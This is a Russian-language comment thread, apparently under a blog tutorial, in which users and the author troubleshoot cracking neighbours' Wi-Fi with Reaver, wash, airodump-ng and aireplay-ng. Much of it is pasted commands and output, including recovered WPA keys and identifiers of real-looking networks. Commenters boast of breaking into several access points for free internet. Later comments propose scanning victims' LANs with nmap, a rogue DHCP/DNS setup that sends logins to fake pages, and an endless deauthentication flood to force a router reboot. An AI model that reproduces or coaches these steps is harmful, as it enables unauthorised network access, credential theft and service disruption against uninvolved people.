[+] WPA PSK: ‘EE8568793151C695D6D2C7972ABC94DC67A3A446F4068FF259F2091D183B4ED0′
[+] AP SSID: ‘Network-b0487af41d30′
[+] Nothing done, nothing to save.
Ув.издатель татьи!
подскажите в чем может быть причина?
почему ревер выдает совершенно разные пороли…
вот результат.
root@bt:~# reaver -i mon0 -b B0:48:7A:F4:1D:30 -vv -p 00023375
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from B0:48:7A:F4:1D:30
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 4
[+] Associated with B0:48:7A:F4:1D:30 (ESSID: TP-LINK_F41D30)
[+] Trying pin 00023375
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 4
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 24 seconds
[+] WPS PIN: ’00023375?
[+] WPA PSK: ’1046E116D237C56259EBA7C577DC8F09E800E3698A5E89EF819A7CD0F6E66587?
[+] AP SSID: ‘Network-b0487af41d30?
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b B0:48:7A:F4:1D:30 -vv -p 00023375
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from B0:48:7A:F4:1D:30
[+] Switching mon0 to channel 4
[+] Associated with B0:48:7A:F4:1D:30 (ESSID: TP-LINK_F41D30)
[+] Trying pin 00023375
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ’00023375?
[+] WPA PSK: ‘EE8568793151C695D6D2C7972ABC94DC67A3A446F4068FF259F2091D183B4ED0?
[+] AP SSID: ‘Network-b0487af41d30?
[+] Nothing done, nothing to save
У меня та же ситуация,при каждом взломе одной и той же АР выдаёт разные пароли состоящие из 64-х символов.Да и со второй АР та же борода,и обе TP_LINK
А Hub-lex ни как не хочет комментировать.
Ув. hub-lex прошу обратите внимание :?: .
Уважаемый Hub-lex в моем случае выскакивает:
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking. O чем это и как бороться пожалуйста подскажите.
p.s. в обозримой сети только одна точка с WPC. PWR -52dB.
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checkingАР не позволяет перебирать пины быстро.
ну а проценты (ход выполнения) идут?
спасибо за ответ.
проценты не идут,а постоянно повторяется это сообщение
Уважаемый Hub-lex, еще вопрос, пару дней назад я сканировал эту точку, добрался до 75 проц остановился по выше указанной причине, к сожалению не сохранил сессию, а далее как сразу при подключении указывает на неспособность обработки. В чем причина и есть ли выход?
здравствуйте!подскажите пожалуйста,подключение к сети есть,но без доступа к интернету.
Ну тут все просто, делайте то что делают при обычном анализе локальной сети: ping, traceroute & etc.
p.s.: может быть просто к Интернету не подключен…смотреть в общем надо
диагностика сетей windows7 сообщает:сетевой адаптер не имеет допустимых параметров настройки IP
и причем тут “диагностика сетей windows7″? можете выполнить то, что было написано в предыдущем комментарии? и делайте все в ВТ5. на кой черт вам windows и ее “диагностика сетей windows7″?!
я использовал wifiway-3.4_with_inflator.iso там тоже есть ривер,благодаря вашему блогу,за что отдельное спасибо,нашел пароли к двум сетям обе открылись но доступа к интернету нет.С BT5R2-GNOME-64 непонятно,записал образ загрузочной влешки,с неё загрузил BT5,а дальше что делать?устанавливать на жесткий диск или с флешки работать и можно ли установить русский язык?может у вас есть мануал по работе с BT5.
For Эдик Суровый
Вы не правы. Возможно обойти блокировку DD-WRT, осуществляя атаки на рутеры, где он установлен, а также есть возможность использовать еще один метод атак на маршрутизаторы с открытым исходным кодом, о котором подробнее можно узнать в некоторых источниках в сети.
А можно насчет этого более подробно написать или ссылки дать.
Заранее спасибо.
p.s.: выйди в скайп, а то словить никак не могу =)
какой уровень сигнала можно считать не приемлемым для лома? 70, 80, 90dbm? Не могу никак ушатать точки с wps, у всех сигналы от 70-90dbm
В airodump-ng уровень сигнала обозначается, например так: -40, -65, -35. Обращайте внимание на – “минус”. Из представленных сигналов, самым лучшим будет -35. Потому что, чем ближе к нулю, тем лучше.
Начинать взлом можно с уровня сигнала ~= -60, -65. Но на самом деле лучше экспериментировать. Бывает такое, что один не может достать с -65, а у другого с таким же уровнем сигнала, все нормально получается.
что можете посоветовать по усилению сигнала? У меня стоит TP-LINK TL-WN7200ND (5dbi, 26dbm) по дефолту вообщем. Может влияет этажность? Вывести устройство на крышу или это бесполезно? Взял адаптер, а результатов не получил. Все сети находятся в диапазоне (от -70 до -95). Моя точка в комнате ловится на самой дальней дистанции на уровне -60-65. Хз что и делать, печалька…
На уровень сигнала влияют мощность передатчика и коэф. усиления антенны.
В ВТ5 можно повысить мощность передатчика таким образом:
# iw reg set BO
# iwconfig wlan# txpower 30
Например моя ALFA в Debian показывает Tx-Power=27 dBm
wlan2 IEEE 802.11bg ESSID:off/anyMode:Managed Access Point: Not-Associated Tx-Power=27 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Что насчет увеличения уровня коэф. усиления антенны, то здесь либо купить хорошую антенну с диаграммой направленности узконаправленная/круговая или сделать антенну самому.
По поводу мощности передатчика, пробовал увеличивать, но это мне никоим образом не помогало. По поводу антенны, что можете конкретно посоветовать или как можно сделать самому? (если можно ссылку) Я так понял коэф.усиления это есть dbi?
в google пишите – “купить антенну wifi”. вам с какой диаграммой направленности?
писать в гугл, эт понятно я уже присмотрел… Насчет направленности без понятия, что и как… Вы говорили о самодельных антеннах, если можно конкретный линк.
По самодельным антеннам тоже в google – “wi fi антенна своими руками”
https://www.google.ru/#hl=ru&newwindow=1&sclient=psy-ab&q=wi+fi+%D0%B0%D0%BD%D1%82%D0%B5%D0%BD%D0%BD%D0%B0+%D1%81%D0%B2%D0%BE%D0%B8%D0%BC%D0%B8+%D1%80%D1%83%D0%BA%D0%B0%D0%BC%D0%B8&oq=wifi+%D0%B0%D0%BD&gs_l=hp.3.1.0j0i10l2j0.0.0.1.111.0.0.0.0.0.0.0.0..0.0…0.0…1c.T8izOhgwMWo&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.&fp=86cc874f69692107&biw=1280&bih=690
По диаграмме направленности: тут вам надо решить, что конкретно вы хотите. вот вам простой, но топорный пример -> если будите заниматься вардрайвингом, тогда подойдет узконаправленная. если все такие большую часть времени сидите на месте, тогда с круговой диаграммой направленности. но я бы купил обе, так на всякий случай.
p.s.: если необходима помощь специалиста по антеннам, обращайтесь. тут как раз классный спец под боком сидит.
Люди добрые! Подскажите пожалуйста,нужно ли ждать окончания этой зугрузки,что делать дальше?
root@bt:~# reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 00:90:4C:C1:AC:21
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
Люди добрые! Подскажите пожалуйста,нужно ли ждать окончания этой зугрузки,что делать дальше?
У вас происходит смена канала. Добавьте номер канала в команду:
# reaver -i mon0 -b 00:90:4C:C1:AC:21 -с №_канала -vv
Спасибо!
Подскажите плз….не запускается startx ( тухнет экран и все…..) в BT4 проблема решалась командой fixvesa…в BT5 такая команда отсутствует…
Не знаю, не знаю…у меня такого не было.
Поищите в google, может быть эта проблема где то обсуждалась.
Что то я не увидел коментов на вопрос “D” и в начале коментариев не помню кто.А именно
после взлома выдаёт пароль
[+] WPA PSK: ’4790D9BE8B165AA20979EC6F1B22627CB7A4B5B6C08903181F65A2F2099040134
пробовал менять МАК своей карты на МАК клиента-который постоянно сидит на этой АР,всё равно пароль не подходит.Да и ещё тема интересная не стоит её закрывать.А,вот вспомнил на второй АР та же ситуация и что интересно на обоих АР TP_LINK.И спасибо АВТОРУ за статью во многом разобрался,и многому научился.Респект иуважуха.
в win 7 просто заходим в панель управления-сеть и интернет-центр управлениями сетями-настройка нового подключения-создание и настройка сети-дальше ищем роутер называем свою сеть так же как и SSID если роутеров много, только методом научного тыка -) дальше находим наш AP он спрашивает пин и при правильном вводе выдаеь пароль сети и да здравствует халява
P.S такое бывает когда провайдер просто подключает не сконфигурирование роутеры, если пользвователь не настроил, то он юзер и можно спокойно пользоватся халявой
P.S P.S спасибо создателю сайта
В качестве спасибо вы можете щелкнуть по рекламе или сделать перепост статей или рассказать о проекте. Т.е. скажите спасибо действием, а не только словами. Ну а с меня новые и интересные статьи.
по рекламе пощелкал а перепост обязательно сделаю.
Заранее спасибо =)
а как быть если роутер один но он совершенно не тот каторый мне нужен ? и при выполнении всех выше перечисленных операции выдает не тот пароль? что можно сделать ?
Можно по подробнее.
в описании выше говорится находите роутер… я нашел но у него вообще какое то левое “Имя”.. ни как не связанное с тем который интересует меня.. далее я переименовываю сеть а роутер не переименовывается и соответственно выдает пароль не от той сети(пароль не подходит) как связан посторонний роутер и необходимая для меня сеть… ?
Hub-lex скажи
# reaver -i mon0 -b 00:90:4C:C1:AC:21 -с №_канала -vv – эту ком.надо вводить в новом терминале или … ???
Как хотите. Вообще, когда wash показал, какие АР c WPS. После этого закрываем Ctrl+C и вводим команду reaver.
Прошло на ура на двух сетях из трех.
Не пошло на Tende.
Автору огромное спастбо за труды, которые будут вознаграждены.
Backtrack 5 R2
Все сделал по плану, с учетом твоих советов другим…
Но вот уже 6 часов у меня такая картина…
…reaver -i mon0 -b … -c 6 -e Denis -vv -A
…
[+] Switching mon0 to channel 6
[+] Waiting for beacon from …
[+] Associated with … (ESSID: Denis)
Без каких либо изменений… Робота идет, прога ламает? Мне ждать дальше? :-)
Я со смарта и не могу предоставить всю последовательность действий:-( *
Будь добр тыкни меня носом в статью как “подстроить” свой МАС…
Я уже благодарен тебе за помощь! :-)
Если проценты идут, тогда просто жди. Если нет, тогда присылай ввод и вывод – будем разбираться.
root@bt:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2651 dhclient3
2717 dhclient3
Process with PID 2651 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros AR2425 ath5k – [phy0]
(monitor mode enabled on mon0)
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 20 s ][ 2012-08-05 19:42
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
B0:48:7A:F6:F6:80 -70 42 2 0 6 54e. WPA2 CCMP PSK Denis
90:F6:52:27:E9:34 -86 27 0 0 1 54e. WPA2 CCMP PSK alinka84
BSSID STATION PWR Rate Lost Frames Probe
B0:48:7A:F6:F6:80 D0:DF:9A:F0:72:BA -1 54e- 0 0 2
root@bt:~# reaver -i mon0 -b B0:48:7A:F6:F6:80 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from B0:48:7A:F6:F6:80
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 6
[!] WARNING: Failed to associate with B0:48:7A:F6:F6:80 (ESSID: Denis)
^C
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b B0:48:7A:F6:F6:80 -c 6 -e Denis -vv -A
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 6
[+] Waiting for beacon from B0:48:7A:F6:F6:80
[+] Associated with B0:48:7A:F6:F6:80 (ESSID: Denis)
Так без изменений 9-10 часов…
Пробывал еще две сети помучать – такЖе, ну только ждал я по десятку минут…
Знаю что все эти “точки” настраивал один и тот же человек /провайдер/контора.
Покажи вывод команды wash.
Как её правильно прописать?
wash -i mon0
root@bt:~# airodump-ng mon0
CH 4 ][ Elapsed: 1 min ][ 2012-08-06 07:09
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
B0:48:7A:F1:CA:4E -88 173 0 0 6 54e. WPA2 CCMP PSK My Net
00:0C:42:26:C5:86 -95 104 15 0 5 54 . WPA2 CCMP PSK
20:CF:30:89:2B:09 -100 63 3 0 11 54 WPA2 CCMP PSK NNN
90:F6:52:27:E9:34 -102 58 0 0 1 54e. WPA2 CCMP PSK alinka84
00:1D:0F:FE:A2:66 -103 40 7 0 6 54 . WPA2 CCMP PSK home_n
90:F6:52:6C:4B:A4 -103 49 0 0 1 54e. WPA2 CCMP PSK chuck
B0:48:7A:CB:F7:6E -103 24 0 0 6 54e. WPA2 CCMP PSK masha
F8:D1:11:52:A2:D2 -103 10 0 0 6 54e. WPA2 CCMP PSK neznau
F8:D1:11:3D:4A:B2 -105 9 0 0 4 54e. WPA2 CCMP PSK home.id9
00:15:6D:E2:8C:9B -105 7 0 0 1 54 . WPA2 TKIP PSK OlegUB
D8:5D:4C:F5:5C:F2 -106 6 0 0 13 54 . WPA2 CCMP PSK smir
B0:48:7A:F4:3B:1E -1 0 0 0 118 -1
BSSID STATION PWR Rate Lost Frames Probe
root@bt:~# wash -i mon0
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
-----------------------------------------------------------------------------------------------------
B0:48:7A:F1:CA:4E 6 -88 1.0 No My Net
F8:D1:11:52:A2:D2 6 -103 1.0 No neznau
F8:D1:11:3D:4A:B2 4 -102 1.0 No home.id9
F8:D1:11:35:B6:AB 1 -102 1.0 No home_Artem
B0:48:7A:A7:FE:00 1 -106 1.0 No TP-LINK_A7FE00
Как я понимаю все печально?!
Где АР – B0:48:7A:F6:F6:80 (ESSID: Denis)?
На тот момент его небыло вообще… А вот сейчас – есть, но пробую wash… Не ловит Denis’а эта команда…
И та же ситуация(связь установлена, а проценты не идут)…
Вот взял на reaver другую точку – дело пошло… Но у Denis’а сигнал по привлекательнее будет, хотелось бы его “нагнуть”…
Окей.
И еще немного тебя помучаю :-)
Вот набралось энное количество процентов… а сигнал точки пропал…
Если она снова появится, процес продолжесть автоматически?
Можно ли как-то сохранять сесию/процес/прогрес, что бы в дальнейшем его возобновить/продолжить?
Как?
Да, можно сохранить сессию. О том как сохранять сессию рассказывалось в комментариях, поищи.
Где-то в коментах читал… Hub-lex говорил, что будет статья о том как ломать вифи без wsp…
Она есть? :)
Если вы про “словить handshake” то да, статья будет. Но не сейчас.
Ясно :)
Сразу прошу прощения за идиотизм вопроса. Не убивайте, пожалуйста, этим никогда не занималась, довольно слабо представляю, что к чему, но других вариантов не осталось,пэтому придётся разбираться. Скажите, пожалуйста, можно ли с помощью инструментов из Backtrack работать через WiFi адаптер, подключённый к комьютеру по Ethernet?
Не понял вашего вопроса. Можете расписать по подробнее?
Сразу прошу прощения за идиотизм вопроса. Я в этих делах слабо разбираюсь, но других вариантов не осталось, так что попробую понять. Скажите пожалуйста, можно ли в принципе работать с инструментами Backtrack через WiFi устройство, подключённое к комьютеру по Ethernet?
Приветствую! Примерно месяц-полтора назад писал я,что удалось взломать АР,правда аж за четверо суток.Сейчас на АР сменены имя и пароль.PIN известен,но выдаёт ошибку при его посыле.Удаётся начать процесс при посыле первых четырех цифрах pin.Начинается взлом при 90.92%,доходит до 99.99% и дальше ничего.Перебирает эти 99.99% до бесконечности.Что не так?
Здравствуйте.
После ввода команды airdump-ng mon0 выводится сообщение: No command “airdump-ng” found, did you mean:Command”airdump-ng” from package”aircrack-ng” (universe) airdump-ng command not found.
Подскажите пожалуйста, что делать дальше?
airоdump-ng, а не airdump-ng.
Спасибо автору этой замечательной статьи.
По-моему, это первая нормально написанная статья, охватывающая разные способы взлома, СПАСИБО!
Кое-что пришлось почерпнуть из других источников (я в Линуксе ноль), но, тем не менее, за неделю упорной работы 4 точки из 5-ти, которые ловятся у меня дома, были успешно взломаны, так или иначе.
Из них Интернеты есть только в двух, в двух пароли успешно подобраны, Интернеты не выдаются.
В связи с этим 3 вопроса (если позволите).
1. Подобрался пароль, подключился с полпинка. Мне по DHCP выдался IP-адрес (10.123.12.120). Интернета нет. Включил через SMAC спуф MAC-адреса клиентв (он был известен – через Windows, с двух компов пытался) – спуф сделался с полпинка, Интернетов нет. В чем может быть дело? Пытался пропинговать весь диапазона сети (вплоть до 255), но пингуюсь лишь сам, да роутер, на который неизвестен пароль (да и логин).
2. Другая сеть. Подобрался пароль. С трудом проходит (?) подключение, Винда пишет “Подключение ограничено или отсутствует”, IP-адрес не выдается никоим образом. В чем может быть дело?
3. Ну и третий вопрос – если на точке стоит IP и MAC-фильтрация, в каком случае можно будет к сети подключиться, но не выйти в Интернет, а в каком – даже не подключиться (зная пароль, конечно).
Как писал выше взлома пару сетей. на одной стоит тп-линк (админ, админ :), на другой сети белкин (ваще без паролей)
можно ли зайти дальше роутера, зная IP других компов?
и как далеко? :)))
Начните со сканирования сети – nmap, например.
Да, nmap есть – попробую, доложусь.
ну, и предположим, что определённые порты открыты?
1. Попытка зайти на маршрутизатор не увенчалась успехом (пробовал и 80 порт, и 8080 – быть может, какой-то нестандартный там есть… Но то, что это роутер – 100%, т. к. при выдаче DHCP пишется именно он в качестве шлюза, 10.123.12.1).
2. Позавчера ситуация очень настороженно изменилась. Без проблем выдался адрес, при попытке зайти на роутер (D-Link 615) и учетная запись User, и Admin были БЕЗ ПАРОЛЕЙ (да-да), никаких MAC-фильтров не было, никакой фильтрации вообще по чему бы то ни было. Лишь в таблице резервирования IP-адресов значились какие-то компьютеры (те, которым DHCP раздавался). Бери да меняй что хочешь.
При том кабель Интернета значился как Disconnected.
А вчера снова ни адреса не выдалось, ничего. Я уже начал сомневаться, что именно я охотник…
здравствуйте!Hub-lex у меня возникли проблемы. Один сам не могу решит помогите пожалуйста ..
вот ..
CH 12 ][ Elapsed: 52 s ][ 2012-08-16 09:55
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:25:12:BE:CE:0D -79 62 2 0 1 54 WPA2 TKIP PSK lopus
BSSID STATION PWR Rate Lost Frames Probe
00:25:12:BE:CE:0D DC:A9:71:41:33:45 -80 0 - 1 0 4 lopus66
root@bt:~# reaver -i mon0 -b 00:25:12:BE:CE:0D -c 1 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 00:25:12:BE:CE:0D
[!] WARNING: Failed to associate with 00:25:12:BE:CE:0D (ESSID: lopus66)
[+] Nothing done, nothing to save.
2раз пробовал только обратите внимание! lopus66
root@bt:~# reaver -i mon0 -b 00:25:12:BE:CE:0D -c 1 -e lopus66 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 00:25:12:BE:CE:0D
[!] WARNING: Failed to associate with 00:25:12:BE:CE:0D (ESSID: lopus66)
[+] Nothing done, nothing to save.
Следите внимательнее за сообщениями об ошибках. Вот что у вас выдало – [!] WARNING: Failed to associate with 00:25:12:BE:CE:0D (ESSID: lopus66)
Это значит вы не смогли “подключиться” к АР. Скорее всего на АР стоит МАС-фильтр.
Кстати, отчего-то besside отказывается работать с ошибкой Crappy Connection (100% loss) или что-то такое, хотя сигнал от ТД отличный. Казалось бы…
http://forum.antichat.ru/threadnav309026-2-10.html
У меня такое показывало двое суток подряд для одной сети с великолепным сигналом. Ни разу не было замечено ни одного подключенного клиента (т. е. и MAC-адрес подменить нечем), видимо, человек фильтры повключал на совесть.
besside тоже не помог
это значить я не смогу взломать ..спасибо за внимании
обязательно Кликну по рекламе..
Уровень сигнала -70 dB качество приема 100% но подбор идет ужасно медленно 200 секунд на комбинацию. Проценты идут, есть смысл ждать?
Да имеет смысл ждать.
Покажите, какие команды вводите.
Адаптер dwa-510 на чипе RT2561. Драйвер компилил из пакета compat-wireless, пропали глюки с вафлей, а так же мощность передатчика стала 20dbm (раньше 15 было). Адаптер перевожу в режим мониторинга iwconfig wlan0 mode monitor (почему то при компиляции airmon-ng не собралась). wash -i wlan0 -C показывает одну точку доступа ssid DIR-615 c включенным wps. Ввожу reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -c 5 -vv.
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 01465679
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: DIR-615)
и так далее, очень редко проскакивает
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 1.42% complete @ 2012-08-17 13:51:40 (393 seconds/pin)
[+] Trying pin 01465679
здравствуйте!Hub-lex backtrack 5 r3 13.08.2012 д.выпуска оно чем отличается от backtrack 5 r2 или что изменено ..вы в курсе ..и у меня wi-fi TP-LINK wn822n оно сможет взломать (lopus66) или порекомендуйте мне какой-нибудь хорошую wifi adapter около 50$ заранее спасибо вам и друзьям!
http://www.xakep.ru/post/59154/default.asp
Могу посоветовать купить ALFA AWUS 036h.
Hub-lex подскажите который лучше ..просто поймите я работаю в Турции здесь я могу купить с сайта ebay.com .. вот этот как
(Alfa AWUS036NH 2000mW USB Wi-Fi Wireless-N Adapter + 9 dBi ANTENNA ARS-N19 KIT) по вашему .друзья и вы помогите Hub-lex не успевает за всеми смотреть
http://www.ebay.com/itm/Alfa-AWUS036NH-2000mW-USB-Wi-Fi-Wireless-N-Adapter-9-dBi-ANTENNA-ARS-N19-KIT-/110887717242?_trksid=p5197.m1998&_trkparms=aid%3D555001%26algo%3DPW.CURRENT%26ao%3D1%26asc%3D18%26meid%3D1383583147672973503%26pid%3D100017%26prg%3D1006%26rk%3D3%26
Подойдет.
спасибо надеюсь не китайски а taiwan
Hub-lex помогите ради бога что я здесь делаю не правильно ..
airodump-ng –encryp wpa mon0
2.airodump-ng -w out -c 11 –bssid 38:59:F9:1E:39:83 mon0
3.др.окно. aireplay-ng -0 1 -a 00:1E:40:EF:7A:C2 -c 38:59:F9:1E:39:83 mon0
результат:
1.CH 11 ][ Elapsed: 1 min ][ 2012-08-27 14:44 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:1E:40:EF:7A:C2 -72 100 720 39 0 11 54 WPA TKI PSK a
BSSID STATION PWR Rate Lost Frames Probe
00:1E:40:EF:7A:C2 38:59:F9:1E:39:83 -71 0 – 1 0 135
2.результат:
root@bt:~# aireplay-ng -0 1 -a 00:1E:40:EF:7A:C2 -c 38:59:F9:1E:39:83 mon0
14:43:27 Waiting for beacon frame (BSSID: 00:1E:40:EF:7A:C2) on channel 11
14:43:28 Sending 64 directed DeAuth. STMAC: [38:59:F9:1E:39:83] [ 0|52 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:1E:40:EF:7A:C2 -c 38:59:F9:1E:39:83 mon0
14:45:27 Waiting for beacon frame (BSSID: 00:1E:40:EF:7A:C2) on channel 11
14:45:28 Sending 64 directed DeAuth. STMAC: [38:59:F9:1E:39:83] [ 0|62 ACKs]
root@bt:~#
3.handshake не выходит в правом верхнем углу что делаю не правильно ..
народ подскажи что я делаю не правильно
handshake не выходит в правом верхнем углу. :?: :?: :?:
Вроде бы все правильно.
Доброго времени суток! подскажи пожалуйста в backtrack 5 r3 river работает шустрее чем в предыдущих версиях или без изменений.Заранее благодарен.
Dobri den Hub-Lex , Prochital ochen mnogo zashix statey, i ochen mnogova nauchilsya, praces Reaver mne ochen ponravilsya , no ochen medleno rabotayet, kak to mojno uskorit praces rabotii Reaver.
I esho xachuu pastavit Skype na Backtrack 5,2 no ne poluchaetca, kak to mojite mne pomoch za rane blagadaren
Такие вопросы задавайте на форумах.
Hub-lex здравствуйте! я купил ALFA AWUS 036h спасибо вам.. вот у меня вопрос вам как сломать вез wps.. помните (Ар lopus66) там выключен wps.. спасибо.
Взломать wifi-сеть WPA/WPA2 можно путем перехвата handshake.
10 дней ломалась точка доступа, учитывая что первые 4 пина подобрались на 25%, теперь точка в моем полном распоряжении :mrgreen: хотя инет у меня есть и скорость поболее, ломал ради спортивного интереса.
Хотел еще поснифить пароли. Есть идея поднять dhcp серв и прописать его в днс роутера, а далее вконтактики и майлы отправлять на фейковые страницы.
Спасибо авторам и разработчикам! За несколько дней взломано 4 точки, в среднем по 10 часов на точку! с большинством описанных проблем столкнулся, но прочитав внимательно все заданные вопросы в теме разобрался самостоятельно! Еще раз спасибо.
Вот только осталась одна неразрешенная проблема, как увеличить мощность принимающей антенны wifi в ноутбуке? Отдельных выходов для подключения дополнительной антенны нет, если только покупать usb wifi усилитель с этого места:
http://www.gadgetsstore.net/index.php?option=com_virtuemart&category_id=20&page=shop.browse&Itemid=21&vmcchk=1&Itemid=21
Если кто пользуется или пользовался такими приблудами, поделитесь мнениями, есть ли принципиальная разница в качестве приема wifi сигнала по сравнению с обычным ноутбуком, а так же совместная работа reaver с этими девайсами!
Отличная статья!! Все получилось) Вопросик один.. А как можно заставить перезагрузить(ся) удаленный роутер??? :?:
Попросить? – http://www.levinkv.ru/medusa-kak-vzlomat-parol-ot-wi-fi-routera-2/
Хочу уточнить))к роутеру, который нужно перезагрузить я еще не подобрал пин. он толи зависает, толи железо у него такое..после перезагрузки reaver какоето время подбирает пин, а позже выдает: WARNING: Receive timeout occured
Можно что-нибудь типа этого использовать чтоб его перезагрузил хозяин:# aireplay-ng -0 999999 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX mon0